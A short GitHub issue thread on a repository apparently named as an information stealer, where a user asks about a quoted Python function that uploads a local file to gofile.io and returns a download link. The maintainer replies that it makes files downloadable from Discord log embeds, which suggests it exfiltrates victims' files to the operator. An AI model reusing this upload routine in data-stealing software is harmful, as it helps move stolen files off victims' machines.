### ISSUE TITLE
what does this do?

### ISSUE THREAD

**Issue by supergarixd** [cankatx/stealer#10]
This pice of code is kind of sus.

def uploadToAnonfiles(path):
    try:return requests.post(f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile', files={'file': open(path, 'rb')}).json()["data"]["downloadPage"]
    except:return False

who is the code sending this file to?

**Comment by cankatx** [comment]
This is how you can download files directly from discord logs embed. It's API request to gofile.io's upload server.
